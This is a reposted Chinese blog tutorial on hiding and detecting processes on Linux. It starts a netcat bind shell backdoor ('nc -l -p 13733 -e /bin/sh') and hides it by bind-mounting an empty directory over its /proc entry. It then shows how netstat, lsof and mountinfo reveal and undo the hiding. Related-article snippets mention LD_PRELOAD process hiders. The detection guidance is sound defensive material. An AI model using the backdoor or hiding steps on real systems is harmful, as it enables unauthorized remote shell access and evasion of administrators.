Linux进程隐藏与检测

最新推荐文章于 2024-10-02 14:33:15 发布
转载 最新推荐文章于 2024-10-02 14:33:15 发布 · 578 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/heycomputer/articles/10298814.html
文章标签:

#网络

本文介绍了一种检测和清除Linux系统中隐藏后门进程的方法。通过使用netstat、lsof、cat /proc/$$/mountinfo和ps aux等命令,可以定位并卸载隐藏的进程挂载点,进而找出并终止恶意的后门进程。文章详细展示了如何从命令行输出中分析隐藏进程的痕迹,以及如何安全地移除它们。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 运行后门
nohup nc -l -p 13733 -e /bin/sh&

2.
ps aux |grep ‘/bin/sh’ 查找进程PID
mkdir /tmp/empty
mount –bind /tmp/empty /proc/进程PID

3.
cat /proc/$$/mountinfo 查看隐藏进程
cat /proc/mounts
mount

4. 接触隐藏
umount /proc/进程PID

入侵检测之隐藏进程检测

1。
[ blackarch ~ ]# netstat -tulnp
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:13733 0.0.0.0:* LISTEN –

2.
[ blackarch ~ ]# lsof -i:13733

无结果打印

3.
[ blackarch ~ ]#cat /proc/$$/mountinfo

263 20 0:42 /empty /proc/5644 rw,nosuid,nodev shared:29 – tmpfs tmpfs rw
发现可疑挂在信息。进程PID5644 挂载点/empty

4.
umount /proc/5644 解除进程挂载

5.
[ blackarch ~ ]# ps aux |grep 5644
root 5644 0.0 0.0 2404 1580 pts/13 S+ 11:08 0:00 nc -l -p 13733 -e /bin/sh
root 5926 0.0 0.0 5088 920 pts/2 S+ 11:21 0:00 grep 5644

转载于:https://www.cnblogs.com/heycomputer/articles/10298814.html

linux下如何隐藏进程(ps/top) 和找到linux进程路径
zhangblss@hotmail.com
01-14 9303
一般linux系统被攻击去根据进程查看文件或脚本,或者隐藏文件。 1、根据进程名,找出pid 例如python # ps -ef|grep python 找到python的pid 2、根据pid可在/proc中找到执行文件路径 # ls -l /proc/pytohpid -------------------------------------------------------
反调试技术:Linux进程隐藏检测对抗指南.pdf
05-02
在万物互联的时代,信息安全已成为数字化进程中的关键基石。从金融交易到医疗数据,从企业机密到个人隐私,每一次数据流转都面临着潜在的安全风险。本文聚焦计算机信息安全核心技术,揭示黑客攻击的常见手法防范...
Linux 进程隐藏
04-26
NULL 博文链接:https://tcspecial.iteye.com/blog/2361998
记一次 Linux 隐藏进程排查
zhuisuiwoxin3的博客
04-17 1682
某一客户环境,机器负载很高,但用户没有运行任务;但是top 、ps -ef查不到这些进程;3.systemctl list-units --type=service --all 排查确认运行的任务是否有些异常服务,5.将找到被修改的文件,chattr -ia 获取权限, rm -rf 删除掉文件。1.到/usr/bin/ 执行 ls -lt 确认最近修改的文件的修改时间。9.修改root 密码,重新生成公钥等,修改ssh 配置文件 进行加固。7.kill -9 掉相应的进程, 一般情况下,负载会降下来。
Linux当中如何隐藏和查看进程
热门推荐
因上努力,果上随缘。但行好事,莫问前程。
09-02 1万+
进程是执行程序的过程,类似于按照图纸,真正去盖房子的过程。同一个程序可以执行多次,每次都可以在内存中开辟独立的空间来装载,从而产生多个进程。不同的进程还可以拥有各自独立的IO接口。操作系统的一个重要功能就是为进程提供方便,比如说为进程分配内存空间,管理进程的相关信息等等,就好像是为我们准备好了一个精美的地址。进程信息是proc目录下动态生成,每个动态创建的进程ID号下面详细的记录了关于该进程的fd,mem,io,cpuset等进程信息。
linux隐藏进程内存查看
iteye_5350的博客
01-23 443
[url]http://blog.youkuaiyun.com/hanner_cheung/article/details/6081440[/url]
Linux进程隐藏检测:对比procfs内存task_struct的差异分析法.pdf
最新发布
06-07
文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅使用。文档仅供学习参考,请勿用作商业用途。 从隐写术到编码转换,从音频隐写到文件结构分析,CTF-Misc 教会你用技术的眼睛...
一行代码教你如何隐藏Linux进程
09-14
这里我们将探讨一种简单的方法,通过一行代码实现Linux进程的小范围隐藏,这种方法适用于学习和趣味实验,但并不推荐用于实际生产环境,因为它很容易被反制且不具备真正的安全保护作用。 首先,我们要理解Linux是...
Perl方法揭示Linux隐藏进程:LKM后门检测优化
本文主要探讨了在Linux环境下利用Perl编程语言来实现隐藏进程查找方法。Linux内核模块(Linux Kernel Module, LKM)后门技术是一种常见的恶意软件手段,通过这种技术,攻击者可以在不被常规进程监控工具察觉的情况下...
权限维持检测Linux隐藏进程发现技术.pdf
04-27
在万物互联的时代,信息安全已成为数字化进程中的关键基石。从金融交易到医疗数据,从企业机密到个人隐私,每一次数据流转都面临着潜在的安全风险。本文聚焦计算机信息安全核心技术,揭示黑客攻击的常见手法防范...
linux隐藏进程的一种方法及遇到的坑
09-15
主要介绍了linux隐藏进程的一种方法,主要实现思路就是利用 LD_PRELOAD 来实现系统函数的劫持,具体实现代码,需要的朋友可以参考下
5种方法得到所有进程名(包括隐藏进程
11-07
VB使用5种方法得到所有进程名(包括隐藏进程),2000系统下可能不能使用,判断系统版本如果是2K以下的系统就报错退出,获取Debug权限这是必须的。获取常规下的进程,打印进程、判断指定进程是否为隐藏进程……   以下5种方法在Windows NT各个版本上都有:   NT 5.1 新增的:   获取KdVersionBlock,从内核空间拷贝到用户空间,或者从用户空间拷贝到用户空间,但是不能从用户空间拷贝到内核空间,从物理地址拷贝到用户空间,不能写到内核空间,读写处理器相关控制块,读写端口,读写总线数据,枚举Kernel Module函数,判断Nt系列函数是否调用成功,创建一个ACE,允许当前用户读写PhysicalMemory
linux 隐藏进程,聊一聊Linux进程隐藏的常见手法及侦测手段
weixin_39621669的博客
04-28 861
严正声明:本文仅限于技术讨论学术学习研究之用,严禁用于其他用途(特别是非法用途,比如非授权攻击之类),否则自行承担后果,一切作者和平台无关,如有发现不妥之处,请及时联系作者和平台0x00.前言进程隐藏是恶意软件隐藏自身痕迹逃避系统管理人员发现的常用伎俩之一,当然,安全防护人员有时候也会使用到,比如隐藏蜜罐中的监控进程而不被入侵者觉察等。笔者也曾在多次安全应急响应经历中遇到过多各式各样的进程隐藏...
Linux查找隐藏病毒进程
人生一张西的博客
10-02 371
Linux查找隐藏病毒进程
【转】Linux进程隐藏的常见手法及侦测手段
tpriwwq的专栏
08-08 9893
Linux系统中进程隐藏的常见手法及侦测方法
(cc) Linux隐藏进程
cnbird's blog
12-10 626
http://blog.chinaunix.net/u3/103654/showart_2053105.htmlhttp://www.wangchao.net.cn/bbsdetail_1474332.html
查看linux隐藏进程的内存占用方法,可用于监控进程是否内存泄漏
eqxu的专栏
12-22 4949
部分被隐藏进程 ps -aux  Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND root     17017  0.0  0
linux隐藏特定进程,linux 隐藏进程
weixin_39638048的博客
04-28 306
2、源码如下root@ubuntu:/var/srt/libprocesshider# cat processhider.c#define _GNU_SOURCE#include #include #include #include #include /** Every process with this name will be excluded*/static const char* proc...
隐藏进程检测
Tommy(凌飞)的专栏
11-17 3510
 隐藏进程检测User Mode下的隐藏进程检测我们先来看一些简单的方法,这些方法可以用在ring3下,用不着驱动。检测的原理是每一个进程活动时都会暴露一些痕迹,可以通过这些痕迹检测到它们。这些痕迹包括打开的句柄、窗口和创建的系统对象。针对类似的检测方法来实现进程隐藏并不困难,但需要考虑进程工作时可能暴露出的所有迹象。目前还没有一个公开的rootkit做到了这一点(遗憾的是私有版本我也还没见到)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值